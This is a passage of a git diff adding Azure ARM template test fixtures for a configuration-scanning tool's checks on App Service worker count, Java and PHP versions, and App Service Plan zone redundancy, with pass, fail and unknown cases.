+          "vnetRouteAllEnabled": "bool",
+          "websiteTimeZone": "string",
+          "webSocketsEnabled": "bool",
+          "windowsFxVersion": "string",
+          "xManagedServiceIdentityId": "int"
+        },
+        "storageAccountRequired": "bool",
+        "virtualNetworkSubnetId": "string",
+        "vnetContentShareEnabled": "bool",
+        "vnetImagePullEnabled": "bool",
+        "vnetRouteAllEnabled": "bool"
+      }
+    }
+  ]
+}
+
diff --git a/tests/arm/checks/resource/example_AppServiceInstanceMinimum/pass2.json b/tests/arm/checks/resource/example_AppServiceInstanceMinimum/pass2.json
new file mode 100644
index 00000000000..f947c2aedc7
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServiceInstanceMinimum/pass2.json
@@ -0,0 +1,330 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "webAppName": {
+      "type": "string",
+      "defaultValue": "AzureLinuxApp",
+      "metadata": {
+        "description": "Base name of the resource such as web app name and app service plan "
+      },
+      "minLength": 2
+    },
+    "sku": {
+      "type": "string",
+      "defaultValue": "S1",
+      "metadata": {
+        "description": "The SKU of App Service Plan "
+      }
+    },
+    "linuxFxVersion": {
+      "type": "string",
+      "defaultValue": "php|7.0",
+      "metadata": {
+        "description": "The Runtime stack of current web app"
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources."
+      }
+    }
+  },
+  "variables": {
+    "webAppPortalName": "[concat(parameters('webAppName'), '-webapp')]",
+    "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]"
+  },
+  "resources": [
+    {
+      "type": "Microsoft.Web/sites/slots",
+      "apiVersion": "2022-09-01",
+      "name": "pass2",
+      "location": "string",
+      "tags": {
+        "tagName1": "tagValue1",
+        "tagName2": "tagValue2"
+      },
+      "kind": "string",
+      "extendedLocation": {
+        "name": "string"
+      },
+      "identity": {
+        "type": "string",
+        "userAssignedIdentities": {}
+      },
+      "properties": {
+        "clientAffinityEnabled": "bool",
+        "clientCertEnabled": "bool",
+        "clientCertExclusionPaths": "string",
+        "clientCertMode": "string",
+        "cloningInfo": {
+          "appSettingsOverrides": {},
+          "cloneCustomHostNames": "bool",
+          "cloneSourceControl": "bool",
+          "configureLoadBalancing": "bool",
+          "correlationId": "string",
+          "hostingEnvironment": "string",
+          "overwrite": "bool",
+          "sourceWebAppId": "string",
+          "sourceWebAppLocation": "string",
+          "trafficManagerProfileId": "string",
+          "trafficManagerProfileName": "string"
+        },
+        "containerSize": "int",
+        "customDomainVerificationId": "string",
+        "dailyMemoryTimeQuota": "int",
+        "enabled": "bool",
+        "hostingEnvironmentProfile": {
+          "id": "string"
+        },
+        "hostNamesDisabled": "bool",
+        "hostNameSslStates": [
+          {
+            "hostType": "string",
+            "name": "string",
+            "sslState": "string",
+            "thumbprint": "string",
+            "toUpdate": "bool",
+            "virtualIP": "string"
+          }
+        ],
+        "httpsOnly": "bool",
+        "hyperV": "bool",
+        "isXenon": "bool",
+        "keyVaultReferenceIdentity": "string",
+        "managedEnvironmentId": "string",
+        "publicNetworkAccess": "string",
+        "redundancyMode": "string",
+        "reserved": "bool",
+        "scmSiteAlsoStopped": "bool",
+        "serverFarmId": "string",
+        "siteConfig": {
+          "acrUseManagedIdentityCreds": "bool",
+          "acrUserManagedIdentityID": "string",
+          "alwaysOn": "bool",
+          "apiDefinition": {
+            "url": "string"
+          },
+          "apiManagementConfig": {
+            "id": "string"
+          },
+          "appCommandLine": "string",
+          "appSettings": [
+            {
+              "name": "string",
+              "value": "string"
+            }
+          ],
+          "autoHealEnabled": "bool",
+          "autoHealRules": {
+            "actions": {
+              "actionType": "string",
+              "customAction": {
+                "exe": "string",
+                "parameters": "string"
+              },
+              "minProcessExecutionTime": "string"
+            },
+            "triggers": {
+              "privateBytesInKB": "int",
+              "requests": {
+                "count": "int",
+                "timeInterval": "string"
+              },
+              "slowRequests": {
+                "count": "int",
+                "path": "string",
+                "timeInterval": "string",
+                "timeTaken": "string"
+              },
+              "slowRequestsWithPath": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "timeInterval": "string",
+                  "timeTaken": "string"
+                }
+              ],
+              "statusCodes": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "status": "int",
+                  "subStatus": "int",
+                  "timeInterval": "string",
+                  "win32Status": "int"
+                }
+              ],
+              "statusCodesRange": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "statusCodes": "string",
+                  "timeInterval": "string"
+                }
+              ]
+            }
+          },
+          "autoSwapSlotName": "string",
+          "azureStorageAccounts": {},
+          "connectionStrings": [
+            {
+              "connectionString": "string",
+              "name": "string",
+              "type": "string"
+            }
+          ],
+          "cors": {
+            "allowedOrigins": [
+              "string"
+            ],
+            "supportCredentials": "bool"
+          },
+          "defaultDocuments": [
+            "string"
+          ],
+          "detailedErrorLoggingEnabled": "bool",
+          "documentRoot": "string",
+          "elasticWebAppScaleLimit": "int",
+          "experiments": {
+            "rampUpRules": [
+              {
+                "actionHostName": "string",
+                "changeDecisionCallbackUrl": "string",
+                "changeIntervalInMinutes": "int",
+                "changeStep": "int",
+                "maxReroutePercentage": "int",
+                "minReroutePercentage": "int",
+                "name": "string",
+                "reroutePercentage": "int"
+              }
+            ]
+          },
+          "ftpsState": "string",
+          "functionAppScaleLimit": "int",
+          "functionsRuntimeScaleMonitoringEnabled": "bool",
+          "handlerMappings": [
+            {
+              "arguments": "string",
+              "extension": "string",
+              "scriptProcessor": "string"
+            }
+          ],
+          "healthCheckPath": "string",
+          "http20Enabled": "bool",
+          "httpLoggingEnabled": "bool",
+          "ipSecurityRestrictions": [
+            {
+              "action": "string",
+              "description": "string",
+              "headers": {},
+              "ipAddress": "string",
+              "name": "string",
+              "priority": "int",
+              "subnetMask": "string",
+              "subnetTrafficTag": "int",
+              "tag": "string",
+              "vnetSubnetResourceId": "string",
+              "vnetTrafficTag": "int"
+            }
+          ],
+          "ipSecurityRestrictionsDefaultAction": "string",
+          "javaContainer": "string",
+          "javaContainerVersion": "string",
+          "javaVersion": "string",
+          "keyVaultReferenceIdentity": "string",
+          "limits": {
+            "maxDiskSizeInMb": "int",
+            "maxMemoryInMb": "int",
+            "maxPercentageCpu": "int"
+          },
+          "linuxFxVersion": "string",
+          "loadBalancing": "string",
+          "localMySqlEnabled": "bool",
+          "logsDirectorySizeLimit": "int",
+          "managedPipelineMode": "string",
+          "managedServiceIdentityId": "int",
+          "metadata": [
+            {
+              "name": "string",
+              "value": "string"
+            }
+          ],
+          "minimumElasticInstanceCount": "int",
+          "minTlsVersion": "1.1",
+          "netFrameworkVersion": "string",
+          "nodeVersion": "string",
+          "numberOfWorkers": 3,
+          "phpVersion": "string",
+          "powerShellVersion": "string",
+          "preWarmedInstanceCount": "int",
+          "publicNetworkAccess": "string",
+          "publishingUsername": "string",
+          "push": {
+            "kind": "string",
+            "properties": {
+              "dynamicTagsJson": "string",
+              "isPushEnabled": "bool",
+              "tagsRequiringAuth": "string",
+              "tagWhitelistJson": "string"
+            }
+          },
+          "pythonVersion": "string",
+          "remoteDebuggingEnabled": "bool",
+          "remoteDebuggingVersion": "string",
+          "requestTracingEnabled": "bool",
+          "requestTracingExpirationTime": "string",
+          "scmIpSecurityRestrictions": [
+            {
+              "action": "string",
+              "description": "string",
+              "headers": {},
+              "ipAddress": "string",
+              "name": "string",
+              "priority": "int",
+              "subnetMask": "string",
+              "subnetTrafficTag": "int",
+              "tag": "string",
+              "vnetSubnetResourceId": "string",
+              "vnetTrafficTag": "int"
+            }
+          ],
+          "scmIpSecurityRestrictionsDefaultAction": "string",
+          "scmIpSecurityRestrictionsUseMain": "bool",
+          "scmMinTlsVersion": "string",
+          "scmType": "string",
+          "tracingOptions": "string",
+          "use32BitWorkerProcess": "bool",
+          "virtualApplications": [
+            {
+              "physicalPath": "string",
+              "preloadEnabled": "bool",
+              "virtualDirectories": [
+                {
+                  "physicalPath": "string",
+                  "virtualPath": "string"
+                }
+              ],
+              "virtualPath": "string"
+            }
+          ],
+          "vnetName": "string",
+          "vnetPrivatePortsCount": "int",
+          "vnetRouteAllEnabled": "bool",
+          "websiteTimeZone": "string",
+          "webSocketsEnabled": "bool",
+          "windowsFxVersion": "string",
+          "xManagedServiceIdentityId": "int"
+        },
+        "storageAccountRequired": "bool",
+        "virtualNetworkSubnetId": "string",
+        "vnetContentShareEnabled": "bool",
+        "vnetImagePullEnabled": "bool",
+        "vnetRouteAllEnabled": "bool"
+      }
+    }
+  ]
+}
+
diff --git a/tests/arm/checks/resource/example_AppServiceInstanceMinimum/unknown.json b/tests/arm/checks/resource/example_AppServiceInstanceMinimum/unknown.json
new file mode 100644
index 00000000000..2b2f7df4fc7
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServiceInstanceMinimum/unknown.json
@@ -0,0 +1,330 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "webAppName": {
+      "type": "string",
+      "defaultValue": "AzureLinuxApp",
+      "metadata": {
+        "description": "Base name of the resource such as web app name and app service plan "
+      },
+      "minLength": 2
+    },
+    "sku": {
+      "type": "string",
+      "defaultValue": "S1",
+      "metadata": {
+        "description": "The SKU of App Service Plan "
+      }
+    },
+    "linuxFxVersion": {
+      "type": "string",
+      "defaultValue": "php|7.0",
+      "metadata": {
+        "description": "The Runtime stack of current web app"
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources."
+      }
+    }
+  },
+  "variables": {
+    "webAppPortalName": "[concat(parameters('webAppName'), '-webapp')]",
+    "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]"
+  },
+  "resources": [
+    {
+      "type": "Microsoft.Web/sites",
+      "apiVersion": "2022-09-01",
+      "name": "unknown",
+      "location": "string",
+      "tags": {
+        "tagName1": "tagValue1",
+        "tagName2": "tagValue2"
+      },
+      "kind": "string",
+      "extendedLocation": {
+        "name": "string"
+      },
+      "identity": {
+        "type": "string",
+        "userAssignedIdentities": {}
+      },
+      "properties": {
+        "clientAffinityEnabled": "bool",
+        "clientCertEnabled": "bool",
+        "clientCertExclusionPaths": "string",
+        "clientCertMode": "string",
+        "cloningInfo": {
+          "appSettingsOverrides": {},
+          "cloneCustomHostNames": "bool",
+          "cloneSourceControl": "bool",
+          "configureLoadBalancing": "bool",
+          "correlationId": "string",
+          "hostingEnvironment": "string",
+          "overwrite": "bool",
+          "sourceWebAppId": "string",
+          "sourceWebAppLocation": "string",
+          "trafficManagerProfileId": "string",
+          "trafficManagerProfileName": "string"
+        },
+        "containerSize": "int",
+        "customDomainVerificationId": "string",
+        "dailyMemoryTimeQuota": "int",
+        "enabled": "bool",
+        "hostingEnvironmentProfile": {
+          "id": "string"
+        },
+        "hostNamesDisabled": "bool",
+        "hostNameSslStates": [
+          {
+            "hostType": "string",
+            "name": "string",
+            "sslState": "string",
+            "thumbprint": "string",
+            "toUpdate": "bool",
+            "virtualIP": "string"
+          }
+        ],
+        "httpsOnly": "bool",
+        "hyperV": "bool",
+        "isXenon": "bool",
+        "keyVaultReferenceIdentity": "string",
+        "managedEnvironmentId": "string",
+        "publicNetworkAccess": "string",
+        "redundancyMode": "string",
+        "reserved": "bool",
+        "scmSiteAlsoStopped": "bool",
+        "serverFarmId": "string",
+        "siteConfig": {
+          "acrUseManagedIdentityCreds": "bool",
+          "acrUserManagedIdentityID": "string",
+          "alwaysOn": "bool",
+          "apiDefinition": {
+            "url": "string"
+          },
+          "apiManagementConfig": {
+            "id": "string"
+          },
+          "appCommandLine": "string",
+          "appSettings": [
+            {
+              "name": "string",
+              "value": "string"
+            }
+          ],
+          "autoHealEnabled": "bool",
+          "autoHealRules": {
+            "actions": {
+              "actionType": "string",
+              "customAction": {
+                "exe": "string",
+                "parameters": "string"
+              },
+              "minProcessExecutionTime": "string"
+            },
+            "triggers": {
+              "privateBytesInKB": "int",
+              "requests": {
+                "count": "int",
+                "timeInterval": "string"
+              },
+              "slowRequests": {
+                "count": "int",
+                "path": "string",
+                "timeInterval": "string",
+                "timeTaken": "string"
+              },
+              "slowRequestsWithPath": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "timeInterval": "string",
+                  "timeTaken": "string"
+                }
+              ],
+              "statusCodes": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "status": "int",
+                  "subStatus": "int",
+                  "timeInterval": "string",
+                  "win32Status": "int"
+                }
+              ],
+              "statusCodesRange": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "statusCodes": "string",
+                  "timeInterval": "string"
+                }
+              ]
+            }
+          },
+          "autoSwapSlotName": "string",
+          "azureStorageAccounts": {},
+          "connectionStrings": [
+            {
+              "connectionString": "string",
+              "name": "string",
+              "type": "string"
+            }
+          ],
+          "cors": {
+            "allowedOrigins": [
+              "string"
+            ],
+            "supportCredentials": "bool"
+          },
+          "defaultDocuments": [
+            "string"
+          ],
+          "detailedErrorLoggingEnabled": "bool",
+          "documentRoot": "string",
+          "elasticWebAppScaleLimit": "int",
+          "experiments": {
+            "rampUpRules": [
+              {
+                "actionHostName": "string",
+                "changeDecisionCallbackUrl": "string",
+                "changeIntervalInMinutes": "int",
+                "changeStep": "int",
+                "maxReroutePercentage": "int",
+                "minReroutePercentage": "int",
+                "name": "string",
+                "reroutePercentage": "int"
+              }
+            ]
+          },
+          "ftpsState": "string",
+          "functionAppScaleLimit": "int",
+          "functionsRuntimeScaleMonitoringEnabled": "bool",
+          "handlerMappings": [
+            {
+              "arguments": "string",
+              "extension": "string",
+              "scriptProcessor": "string"
+            }
+          ],
+          "healthCheckPath": "string",
+          "http20Enabled": "bool",
+          "httpLoggingEnabled": "bool",
+          "ipSecurityRestrictions": [
+            {
+              "action": "string",
+              "description": "string",
+              "headers": {},
+              "ipAddress": "string",
+              "name": "string",
+              "priority": "int",
+              "subnetMask": "string",
+              "subnetTrafficTag": "int",
+              "tag": "string",
+              "vnetSubnetResourceId": "string",
+              "vnetTrafficTag": "int"
+            }
+          ],
+          "ipSecurityRestrictionsDefaultAction": "string",
+          "javaContainer": "string",
+          "javaContainerVersion": "string",
+          "javaVersion": "string",
+          "keyVaultReferenceIdentity": "string",
+          "limits": {
+            "maxDiskSizeInMb": "int",
+            "maxMemoryInMb": "int",
+            "maxPercentageCpu": "int"
+          },
+          "linuxFxVersion": "string",
+          "loadBalancing": "string",
+          "localMySqlEnabled": "bool",
+          "logsDirectorySizeLimit": "int",
+          "managedPipelineMode": "string",
+          "managedServiceIdentityId": "int",
+          "metadata": [
+            {
+              "name": "string",
+              "value": "string"
+            }
+          ],
+          "minimumElasticInstanceCount": "int",
+          "minTlsVersion": "1.1",
+          "netFrameworkVersion": "string",
+          "nodeVersion": "string",
+          "numberOfWorkers": false,
+          "phpVersion": "string",
+          "powerShellVersion": "string",
+          "preWarmedInstanceCount": "int",
+          "publicNetworkAccess": "string",
+          "publishingUsername": "string",
+          "push": {
+            "kind": "string",
+            "properties": {
+              "dynamicTagsJson": "string",
+              "isPushEnabled": "bool",
+              "tagsRequiringAuth": "string",
+              "tagWhitelistJson": "string"
+            }
+          },
+          "pythonVersion": "string",
+          "remoteDebuggingEnabled": "bool",
+          "remoteDebuggingVersion": "string",
+          "requestTracingEnabled": "bool",
+          "requestTracingExpirationTime": "string",
+          "scmIpSecurityRestrictions": [
+            {
+              "action": "string",
+              "description": "string",
+              "headers": {},
+              "ipAddress": "string",
+              "name": "string",
+              "priority": "int",
+              "subnetMask": "string",
+              "subnetTrafficTag": "int",
+              "tag": "string",
+              "vnetSubnetResourceId": "string",
+              "vnetTrafficTag": "int"
+            }
+          ],
+          "scmIpSecurityRestrictionsDefaultAction": "string",
+          "scmIpSecurityRestrictionsUseMain": "bool",
+          "scmMinTlsVersion": "string",
+          "scmType": "string",
+          "tracingOptions": "string",
+          "use32BitWorkerProcess": "bool",
+          "virtualApplications": [
+            {
+              "physicalPath": "string",
+              "preloadEnabled": "bool",
+              "virtualDirectories": [
+                {
+                  "physicalPath": "string",
+                  "virtualPath": "string"
+                }
+              ],
+              "virtualPath": "string"
+            }
+          ],
+          "vnetName": "string",
+          "vnetPrivatePortsCount": "int",
+          "vnetRouteAllEnabled": "bool",
+          "websiteTimeZone": "string",
+          "webSocketsEnabled": "bool",
+          "windowsFxVersion": "string",
+          "xManagedServiceIdentityId": "int"
+        },
+        "storageAccountRequired": "bool",
+        "virtualNetworkSubnetId": "string",
+        "vnetContentShareEnabled": "bool",
+        "vnetImagePullEnabled": "bool",
+        "vnetRouteAllEnabled": "bool"
+      }
+    }
+  ]
+}
+
diff --git a/tests/arm/checks/resource/example_AppServiceInstanceMinimum/unknown2.json b/tests/arm/checks/resource/example_AppServiceInstanceMinimum/unknown2.json
new file mode 100644
index 00000000000..bb5ab80468d
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServiceInstanceMinimum/unknown2.json
@@ -0,0 +1,330 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "webAppName": {
+      "type": "string",
+      "defaultValue": "AzureLinuxApp",
+      "metadata": {
+        "description": "Base name of the resource such as web app name and app service plan "
+      },
+      "minLength": 2
+    },
+    "sku": {
+      "type": "string",
+      "defaultValue": "S1",
+      "metadata": {
+        "description": "The SKU of App Service Plan "
+      }
+    },
+    "linuxFxVersion": {
+      "type": "string",
+      "defaultValue": "php|7.0",
+      "metadata": {
+        "description": "The Runtime stack of current web app"
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources."
+      }
+    }
+  },
+  "variables": {
+    "webAppPortalName": "[concat(parameters('webAppName'), '-webapp')]",
+    "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]"
+  },
+  "resources": [
+    {
+      "type": "Microsoft.Web/sites/slots",
+      "apiVersion": "2022-09-01",
+      "name": "unknown2",
+      "location": "string",
+      "tags": {
+        "tagName1": "tagValue1",
+        "tagName2": "tagValue2"
+      },
+      "kind": "string",
+      "extendedLocation": {
+        "name": "string"
+      },
+      "identity": {
+        "type": "string",
+        "userAssignedIdentities": {}
+      },
+      "properties": {
+        "clientAffinityEnabled": "bool",
+        "clientCertEnabled": "bool",
+        "clientCertExclusionPaths": "string",
+        "clientCertMode": "string",
+        "cloningInfo": {
+          "appSettingsOverrides": {},
+          "cloneCustomHostNames": "bool",
+          "cloneSourceControl": "bool",
+          "configureLoadBalancing": "bool",
+          "correlationId": "string",
+          "hostingEnvironment": "string",
+          "overwrite": "bool",
+          "sourceWebAppId": "string",
+          "sourceWebAppLocation": "string",
+          "trafficManagerProfileId": "string",
+          "trafficManagerProfileName": "string"
+        },
+        "containerSize": "int",
+        "customDomainVerificationId": "string",
+        "dailyMemoryTimeQuota": "int",
+        "enabled": "bool",
+        "hostingEnvironmentProfile": {
+          "id": "string"
+        },
+        "hostNamesDisabled": "bool",
+        "hostNameSslStates": [
+          {
+            "hostType": "string",
+            "name": "string",
+            "sslState": "string",
+            "thumbprint": "string",
+            "toUpdate": "bool",
+            "virtualIP": "string"
+          }
+        ],
+        "httpsOnly": "bool",
+        "hyperV": "bool",
+        "isXenon": "bool",
+        "keyVaultReferenceIdentity": "string",
+        "managedEnvironmentId": "string",
+        "publicNetworkAccess": "string",
+        "redundancyMode": "string",
+        "reserved": "bool",
+        "scmSiteAlsoStopped": "bool",
+        "serverFarmId": "string",
+        "siteConfig": {
+          "acrUseManagedIdentityCreds": "bool",
+          "acrUserManagedIdentityID": "string",
+          "alwaysOn": "bool",
+          "apiDefinition": {
+            "url": "string"
+          },
+          "apiManagementConfig": {
+            "id": "string"
+          },
+          "appCommandLine": "string",
+          "appSettings": [
+            {
+              "name": "string",
+              "value": "string"
+            }
+          ],
+          "autoHealEnabled": "bool",
+          "autoHealRules": {
+            "actions": {
+              "actionType": "string",
+              "customAction": {
+                "exe": "string",
+                "parameters": "string"
+              },
+              "minProcessExecutionTime": "string"
+            },
+            "triggers": {
+              "privateBytesInKB": "int",
+              "requests": {
+                "count": "int",
+                "timeInterval": "string"
+              },
+              "slowRequests": {
+                "count": "int",
+                "path": "string",
+                "timeInterval": "string",
+                "timeTaken": "string"
+              },
+              "slowRequestsWithPath": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "timeInterval": "string",
+                  "timeTaken": "string"
+                }
+              ],
+              "statusCodes": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "status": "int",
+                  "subStatus": "int",
+                  "timeInterval": "string",
+                  "win32Status": "int"
+                }
+              ],
+              "statusCodesRange": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "statusCodes": "string",
+                  "timeInterval": "string"
+                }
+              ]
+            }
+          },
+          "autoSwapSlotName": "string",
+          "azureStorageAccounts": {},
+          "connectionStrings": [
+            {
+              "connectionString": "string",
+              "name": "string",
+              "type": "string"
+            }
+          ],
+          "cors": {
+            "allowedOrigins": [
+              "string"
+            ],
+            "supportCredentials": "bool"
+          },
+          "defaultDocuments": [
+            "string"
+          ],
+          "detailedErrorLoggingEnabled": "bool",
+          "documentRoot": "string",
+          "elasticWebAppScaleLimit": "int",
+          "experiments": {
+            "rampUpRules": [
+              {
+                "actionHostName": "string",
+                "changeDecisionCallbackUrl": "string",
+                "changeIntervalInMinutes": "int",
+                "changeStep": "int",
+                "maxReroutePercentage": "int",
+                "minReroutePercentage": "int",
+                "name": "string",
+                "reroutePercentage": "int"
+              }
+            ]
+          },
+          "ftpsState": "string",
+          "functionAppScaleLimit": "int",
+          "functionsRuntimeScaleMonitoringEnabled": "bool",
+          "handlerMappings": [
+            {
+              "arguments": "string",
+              "extension": "string",
+              "scriptProcessor": "string"
+            }
+          ],
+          "healthCheckPath": "string",
+          "http20Enabled": "bool",
+          "httpLoggingEnabled": "bool",
+          "ipSecurityRestrictions": [
+            {
+              "action": "string",
+              "description": "string",
+              "headers": {},
+              "ipAddress": "string",
+              "name": "string",
+              "priority": "int",
+              "subnetMask": "string",
+              "subnetTrafficTag": "int",
+              "tag": "string",
+              "vnetSubnetResourceId": "string",
+              "vnetTrafficTag": "int"
+            }
+          ],
+          "ipSecurityRestrictionsDefaultAction": "string",
+          "javaContainer": "string",
+          "javaContainerVersion": "string",
+          "javaVersion": "string",
+          "keyVaultReferenceIdentity": "string",
+          "limits": {
+            "maxDiskSizeInMb": "int",
+            "maxMemoryInMb": "int",
+            "maxPercentageCpu": "int"
+          },
+          "linuxFxVersion": "string",
+          "loadBalancing": "string",
+          "localMySqlEnabled": "bool",
+          "logsDirectorySizeLimit": "int",
+          "managedPipelineMode": "string",
+          "managedServiceIdentityId": "int",
+          "metadata": [
+            {
+              "name": "string",
+              "value": "string"
+            }
+          ],
+          "minimumElasticInstanceCount": "int",
+          "minTlsVersion": "1.1",
+          "netFrameworkVersion": "string",
+          "nodeVersion": "string",
+          "numberOfWorkers": true,
+          "phpVersion": "string",
+          "powerShellVersion": "string",
+          "preWarmedInstanceCount": "int",
+          "publicNetworkAccess": "string",
+          "publishingUsername": "string",
+          "push": {
+            "kind": "string",
+            "properties": {
+              "dynamicTagsJson": "string",
+              "isPushEnabled": "bool",
+              "tagsRequiringAuth": "string",
+              "tagWhitelistJson": "string"
+            }
+          },
+          "pythonVersion": "string",
+          "remoteDebuggingEnabled": "bool",
+          "remoteDebuggingVersion": "string",
+          "requestTracingEnabled": "bool",
+          "requestTracingExpirationTime": "string",
+          "scmIpSecurityRestrictions": [
+            {
+              "action": "string",
+              "description": "string",
+              "headers": {},
+              "ipAddress": "string",
+              "name": "string",
+              "priority": "int",
+              "subnetMask": "string",
+              "subnetTrafficTag": "int",
+              "tag": "string",
+              "vnetSubnetResourceId": "string",
+              "vnetTrafficTag": "int"
+            }
+          ],
+          "scmIpSecurityRestrictionsDefaultAction": "string",
+          "scmIpSecurityRestrictionsUseMain": "bool",
+          "scmMinTlsVersion": "string",
+          "scmType": "string",
+          "tracingOptions": "string",
+          "use32BitWorkerProcess": "bool",
+          "virtualApplications": [
+            {
+              "physicalPath": "string",
+              "preloadEnabled": "bool",
+              "virtualDirectories": [
+                {
+                  "physicalPath": "string",
+                  "virtualPath": "string"
+                }
+              ],
+              "virtualPath": "string"
+            }
+          ],
+          "vnetName": "string",
+          "vnetPrivatePortsCount": "int",
+          "vnetRouteAllEnabled": "bool",
+          "websiteTimeZone": "string",
+          "webSocketsEnabled": "bool",
+          "windowsFxVersion": "string",
+          "xManagedServiceIdentityId": "int"
+        },
+        "storageAccountRequired": "bool",
+        "virtualNetworkSubnetId": "string",
+        "vnetContentShareEnabled": "bool",
+        "vnetImagePullEnabled": "bool",
+        "vnetRouteAllEnabled": "bool"
+      }
+    }
+  ]
+}
+
diff --git a/tests/arm/checks/resource/example_AppServiceJavaVersion/fail.json b/tests/arm/checks/resource/example_AppServiceJavaVersion/fail.json
new file mode 100644
index 00000000000..9c56d83f5d5
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServiceJavaVersion/fail.json
@@ -0,0 +1,21 @@
+{
+    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+    "contentVersion": "1.0.0.0",
+    "resources": [
+        {
+            "type": "Microsoft.Web/sites",
+            "apiVersion": "2021-02-01",
+            "name": "fail",
+            "properties": {
+                "publisherEmail": "[parameters('adminEmail')]",
+                "publisherName": "[parameters('organizationName')]",
+                "customProperties": "[parameters('customProperties')]"
+            },
+            "siteConfig": {
+                "javaVersion": "13"
+            },
+            "resources": [],
+            "dependsOn": []
+        }
+    ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AppServiceJavaVersion/pass.json b/tests/arm/checks/resource/example_AppServiceJavaVersion/pass.json
new file mode 100644
index 00000000000..efc82c16d50
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServiceJavaVersion/pass.json
@@ -0,0 +1,21 @@
+{
+    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+    "contentVersion": "1.0.0.0",
+    "resources": [
+        {
+            "type": "Microsoft.Web/sites",
+            "apiVersion": "2021-02-01",
+            "name": "pass",
+            "properties": {
+                "publisherEmail": "[parameters('adminEmail')]",
+                "publisherName": "[parameters('organizationName')]",
+                "customProperties": "[parameters('customProperties')]"
+            },
+            "siteConfig": {
+                "javaVersion": "17"
+            },
+            "resources": [],
+            "dependsOn": []
+        }
+    ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AppServicePHPVersion/fail.json b/tests/arm/checks/resource/example_AppServicePHPVersion/fail.json
new file mode 100644
index 00000000000..ebbd6450ce2
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServicePHPVersion/fail.json
@@ -0,0 +1,20 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Web/sites",
+      "apiVersion": "2022-09-01",
+      "name": "fail",
+      "location": "[resourceGroup().location]",
+      "properties": {
+        "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', 'example-app-service-plan')]",
+        "httpsOnly": true,
+        "siteConfig": {
+          "phpVersion": "7.4",
+          "scmType": "someValue"
+        }
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AppServicePHPVersion/pass.json b/tests/arm/checks/resource/example_AppServicePHPVersion/pass.json
new file mode 100644
index 00000000000..49d513235d8
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServicePHPVersion/pass.json
@@ -0,0 +1,20 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Web/sites",
+      "apiVersion": "2021-02-01",
+      "name": "pass",
+      "location": "[resourceGroup().location]",
+      "properties": {
+        "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', 'example-app-service-plan')]",
+        "httpsOnly": true,
+        "siteConfig": {
+          "phpVersion": "8.1",
+          "scmType": "someValue"
+        }
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AppServicePlanZoneRedundant/fail.json b/tests/arm/checks/resource/example_AppServicePlanZoneRedundant/fail.json
new file mode 100644
index 00000000000..d5fdc99f649
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServicePlanZoneRedundant/fail.json
@@ -0,0 +1,20 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Web/serverfarms",
+      "apiVersion": "2021-02-01",
+      "name": "fail",
+      "location": "[resourceGroup().location]",
+      "properties": {
+        "zoneRedundant": false,
+        "resourceGroupName": "[resourceGroup().name]",
+        "osType": "Linux",
+        "sku": {
+          "name": "P1v2"
+        }
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AppServicePlanZoneRedundant/fail2.json b/tests/arm/checks/resource/example_AppServicePlanZoneRedundant/fail2.json
new file mode 100644
index 00000000000..8007f42b557
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServicePlanZoneRedundant/fail2.json
@@ -0,0 +1,19 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Web/serverfarms",
+      "apiVersion": "2021-02-01",
